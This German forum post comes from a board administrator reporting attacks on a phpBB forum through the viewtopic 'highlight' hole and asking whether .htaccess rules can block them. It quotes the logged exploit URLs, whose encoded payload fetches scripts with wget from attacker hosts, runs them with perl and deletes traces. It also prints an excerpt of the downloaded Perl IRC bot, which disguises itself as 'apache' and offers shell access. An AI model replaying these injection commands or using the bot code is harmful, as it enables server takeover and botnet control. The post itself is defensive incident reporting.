Tja, habe diese Hacker eben auch im Forum.
Sie versuchen, über die viewtopic-Sicherheitslücke das Board zu hacken. Url sieht ähnlich aus, wie die von hackepeter bereits gepostete:
/viewtopic.php?t=2409&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.h4ck3rsbr.net/Virus.txt;perl%20Virus.txt;wget%20locais.v10.com.br/w;perl%20w;rm%20-rf%20w*;rm%20-rf%20Virus*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
User-Agent: LWP::Simple/5.800, wobei sich die Zahl /5.800 bei nahezu jedem Seitenaufruf verändert.
/viewtopic.php?t=2563&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/var/tmp;wget%20www.h4ck3rsbr.net/Virus.txt;perl%20Virus.txt;wget%20locais.v10.com.br/w;perl%20w;rm%20-rf%20w*;rm%20-rf%20Virus*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
IP: 82.165.43.50
Host: p15163234.pureserver.info
Die Host-Angaben ändern sich auch laufend, eigentlich bei jeder Anfrage, ebenso wie die IP-Adressen; mit Sperren läuft da nichts.
Die Virus-Txt habe ich mir auch angesehen. Scheinbar wird hier versucht, über einen IRC-Channel in Kombination mit den Usernamen die highlight-Sicherheitslücke auszunutzen.
Code: Alles auswählen
#!/usr/bin/perl
################ CONFIGURACAO #################################################################
my $processo = 'apache'; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $MODOME='+p'; # Modo Do Bot #
#----------------------------------------------################################################
my $linas_max='10'; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep='3'; # ele dorme X segundos #
##################### IRC #####################################################################
my @adms=("Shell"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#Virus :sp4m2005");# Canais #
#----------------------------------------------################################################
my $nick='Virus_'; # Nick do bot. Caso esteja em uso vai aparecer #
# # aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = 'ViruS'; # User ID #
#----------------------------------------------################################################
my $realname = '1Admin14: 1O_Psicopata_'; #
#----------------------------------------------################################################
$servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado #
# # caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta='6667'; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = '1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
etc. etc. (ein Auszug), ich hab mir die Virus.txt mal runtergeladen.
Mit einer .htaccess-Anweisung wird man da wohl nichts erreichen können, oder?
Ich meine die hier:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527
RewriteRule ^.*$ - [F,L]
Oder Larsneos version:
RewriteCond %{QUERY_STRING} highlight=(.*)esystem\(chr\(
RewriteRule (.*) - [F]